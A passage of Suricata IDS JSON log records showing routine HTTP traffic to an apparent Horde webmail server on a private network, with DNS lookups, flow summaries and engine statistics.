Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6978}} {"timestamp":"2020-02-29T00:09:42.000194+0000","event_type":"stats","stats":{"uptime":14234,"capture":{"kernel_packets":134231,"kernel_drops":0},"decoder":{"pkts":134235,"bytes":92711293,"invalid":185,"ipv4":132764,"ipv6":8,"ethernet":134235,"raw":0,"null":0,"sll":0,"tcp":127579,"udp":4985,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092160},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2732,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2748,"synack":2739,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1772,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2275,"failed_udp":110},"tx":{"http":4571,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2354}},"flow_mgr":{"closed_pruned":2715,"new_pruned":15,"est_pruned":2334,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":1,"flows_timeout":1,"flows_timeout_inuse":1,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17193,"memcap_state":0,"memcap_global":0},"http":{"memuse":87370,"memcap":0}}} {"timestamp":"2020-02-29T00:09:44.645754+0000","flow_id":1943479878474362,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41241,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49461,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:44.754265+0000","flow_id":1943479878474362,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41241,"proto":"UDP","dns":{"type":"answer","id":49461,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:44.754265+0000","flow_id":1943479878474362,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41241,"proto":"UDP","dns":{"type":"answer","id":49461,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:44.893739+0000","flow_id":1388849276691051,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52712,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7849}} {"timestamp":"2020-02-29T00:09:46.232090+0000","flow_id":1979596258201268,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34780,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6978},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":37764,"tx_id":0}} {"timestamp":"2020-02-29T00:09:49.000241+0000","event_type":"stats","stats":{"uptime":14241,"capture":{"kernel_packets":134266,"kernel_drops":0},"decoder":{"pkts":134270,"bytes":92729762,"invalid":185,"ipv4":132795,"ipv6":8,"ethernet":134270,"raw":0,"null":0,"sll":0,"tcp":127607,"udp":4988,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092160},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2733,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2749,"synack":2740,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1774,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2276,"failed_udp":110},"tx":{"http":4572,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2355}},"flow_mgr":{"closed_pruned":2716,"new_pruned":15,"est_pruned":2335,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":17523,"memcap_state":0,"memcap_global":0},"http":{"memuse":156103,"memcap":0}}} {"timestamp":"2020-02-29T00:09:49.081618+0000","flow_id":1388849276691051,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52712,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7849},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":43730,"tx_id":0}} {"timestamp":"2020-02-29T00:09:49.091380+0000","flow_id":1254571419460852,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45436,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":5327,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:49.199155+0000","flow_id":1254571419460852,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45436,"proto":"UDP","dns":{"type":"answer","id":5327,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:49.199155+0000","flow_id":1254571419460852,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45436,"proto":"UDP","dns":{"type":"answer","id":5327,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:49.265090+0000","flow_id":1388849276691051,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52712,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5367}} {"timestamp":"2020-02-29T00:09:51.000277+0000","flow_id":1140587262819103,"event_type":"flow","src_ip":"192.168.10.122","src_port":54066,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:50.047903+0000","end":"2020-02-29T00:04:50.157141+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:52.533076+0000","flow_id":280640340632148,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52733,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":33863,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:52.641396+0000","flow_id":280640340632148,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52733,"proto":"UDP","dns":{"type":"answer","id":33863,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:52.641396+0000","flow_id":280640340632148,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52733,"proto":"UDP","dns":{"type":"answer","id":33863,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:52.717546+0000","flow_id":1083094850400979,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34782,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5608}} {"timestamp":"2020-02-29T00:09:54.266549+0000","flow_id":1388849276691051,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52712,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5367},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":27082,"tx_id":1}} {"timestamp":"2020-02-29T00:09:56.000232+0000","event_type":"stats","stats":{"uptime":14248,"capture":{"kernel_packets":134300,"kernel_drops":0},"decoder":{"pkts":134303,"bytes":92744834,"invalid":185,"ipv4":132828,"ipv6":8,"ethernet":134303,"raw":0,"null":0,"sll":0,"tcp":127636,"udp":4992,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092736},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2734,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2750,"synack":2741,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1775,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2278,"failed_udp":110},"tx":{"http":4574,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2357}},"flow_mgr":{"closed_pruned":2716,"new_pruned":15,"est_pruned":2336,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":17853,"memcap_state":0,"memcap_global":0},"http":{"memuse":122345,"memcap":0}}} {"timestamp":"2020-02-29T00:09:57.718624+0000","flow_id":1083094850400979,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34782,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5608},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":20700,"tx_id":0}} {"timestamp":"2020-02-29T00:09:58.000585+0000","flow_id":2027510894811779,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"192.99.2.8","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:04:57.449155+0000","end":"2020-02-29T00:04:57.553288+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:00.000926+0000","flow_id":2220367811436415,"event_type":"flow","src_ip":"192.168.10.122","src_port":38736,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:04:59.384895+0000","end":"2020-02-29T00:04:59.493660+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:03.000233+0000","event_type":"stats","stats":{"uptime":14255,"capture":{"kernel_packets":134305,"kernel_drops":0},"decoder":{"pkts":134306,"bytes":92745032,"invalid":185,"ipv4":132831,"ipv6":8,"ethernet":134306,"raw":0,"null":0,"sll":0,"tcp":127639,"udp":4992,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092160},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2734,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2750,"synack":2741,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1775,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2278,"failed_udp":110},"tx":{"http":4574,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2357}},"flow_mgr":{"closed_pruned":2716,"new_pruned":15,"est_pruned":2338,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17523,"memcap_state":0,"memcap_global":0},"http":{"memuse":70626,"memcap":0}}} {"timestamp":"2020-02-29T00:10:04.262384+0000","flow_id":1338237383344368,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52542,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35647,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:04.370921+0000","flow_id":1338237383344368,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52542,"proto":"UDP","dns":{"type":"answer","id":35647,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:04.370921+0000","flow_id":1338237383344368,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52542,"proto":"UDP","dns":{"type":"answer","id":35647,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:04.390563+0000","flow_id":922471664245492,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34784,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:10:04.390563+0000","flow_id":922471664245492,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34784,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":16,"tx_id":0}} {"timestamp":"2020-02-29T00:10:05.000419+0000","flow_id":607994139066563,"event_type":"flow","src_ip":"192.168.10.122","src_port":54065,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:05:03.934083+0000","end":"2020-02-29T00:05:04.042931+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:06.002843+0000","flow_id":473067756685678,"event_type":"flow","src_ip":"192.168.10.81","src_port":52708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":20,"pkts_toclient":22,"bytes_toserver":3149,"bytes_toclient":20072,"start":"2020-02-29T00:08:55.297326+0000","end":"2020-02-29T00:09:05.483858+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:10:07.000736+0000","flow_id":1380207798145143,"event_type":"flow","src_ip":"192.168.10.130","src_port":34772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1182,"bytes_toclient":709,"start":"2020-02-29T00:08:38.282743+0000","end":"2020-02-29T00:09:06.456416+0000","age":28,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:10:07.026085+0000","flow_id":922471664245492,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34784,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:10:07.034032+0000","flow_id":691737431344368,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45470,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":38273,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:07.142311+0000","flow_id":691737431344368,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45470,"proto":"UDP","dns":{"type":"answer","id":38273,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:07.142311+0000","flow_id":691737431344368,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45470,"proto":"UDP","dns":{"type":"answer","id":38273,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:07.185699+0000","flow_id":922471664245492,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34784,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:10:07.185699+0000","flow_id":922471664245492,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34784,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":215,"tx_id":1}} {"timestamp":"2020-02-29T00:10:07.203534+0000","flow_id":23809887247118,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58586,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":14810,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:07.311742+0000","flow_id":23809887247118,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58586,"proto":"UDP","dns":{"type":"answer","id":14810,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:07.311742+0000","flow_id":23809887247118,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58586,"proto":"UDP","dns":{"type":"answer","id":14810,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:07.439849+0000","flow_id":922471664245492,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34784,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4933}} {"timestamp":"2020-02-29T00:10:08.000384+0000","flow_id":871962829359369,"event_type":"flow","src_ip":"192.168.10.122","src_port":37139,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:05:07.362761+0000","end":"2020-02-29T00:05:07.471041+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:10.000161+0000","event_type":"stats","stats":{"uptime":14262,"capture":{"kernel_packets":134318,"kernel_drops":0},"decoder":{"pkts":134333,"bytes":92755292,"invalid":185,"ipv4":132858,"ipv6":8,"ethernet":134333,"raw":0,"null":0,"sll":0,"tcp":127660,"udp":4998,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092160},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2735,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2751,"synack":2742,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1776,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2281,"failed_udp":110},"tx":{"http":4577,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2360}},"flow_mgr":{"closed_pruned":2718,"new_pruned":15,"est_pruned":2340,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":2,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65532,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17855,"memcap_state":0,"memcap_global":0},"http":{"memuse":122290,"memcap":0}}} 